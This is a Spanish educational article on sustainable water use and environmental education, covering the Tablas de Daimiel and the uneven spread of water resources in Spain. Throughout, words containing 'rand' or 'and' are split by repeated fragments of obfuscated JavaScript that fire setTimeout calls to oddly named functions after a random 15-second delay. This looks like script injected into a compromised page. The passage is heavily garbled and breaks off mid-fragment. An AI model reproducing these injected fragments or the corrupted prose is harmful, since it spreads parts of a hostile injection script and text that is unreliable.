EDUCACIÓN PARA LA EXPLOTACIÓN SOSTENIBLE DEL AGUA

Autor: Mª del Señor Guisado Becerra

La sobreexplotación del agua está generandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando problemas que se están intentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando solucionar mediante una planificación hidráulica. Pero desde las aulas también podemos fomentar un consumo responsable a través de actividades de educación ambiental sobre el agua, las cuales deben contar con una planificación que incluya: 1) Información y Comunicación; 2) Formación y Capacitación ambiental; 3) Participación; 4) Investigación y Evaluación. De este modo podemos avanzar en la consecución de la explotación sostenible del agua.

En los últimos años hemos podido ver en televisión la transformación de las Tablas de Daimiel, uno de los ecosistemas acuáticos más importantes de la Península Ibérica. Aunque en 2010 las Tablas de Daimiel experimentaron una mejoría, debido a las lluvias y al llamado transvase de emergencia, durante meses el parque tuvo menos del 1% de su superficie encharcado peligrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando su supervivencia y su figura de protección de Reserva de la Biosfera, peligro que aún continúa. Este sería un buen ejemplo de degradación de los recursos hídricos, como bien ha reconocido el Ministerio de Medio Ambiente.

Y es que la utilización de los recursos de agua dulce deja mucho que desear. El consumo urbano, industrial, agrario, energético y recreativo de este recurso escaso y tan demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andado está generandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando problemas. Entre los principales problemas del agua en España podemos destacar:

La disponibilidad de agua. Existen cuencas con claros excedentes como la del río Tajo o Ebro, y cuencas con un déficit evidente.

La mayor demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda se concentra principalmente en el arco mediterráneo, cuyos recursos de agua dulce son escasos.

La red de presas actual resulta insuficiente para cubrir una demandom() * 5);if (number1==3){va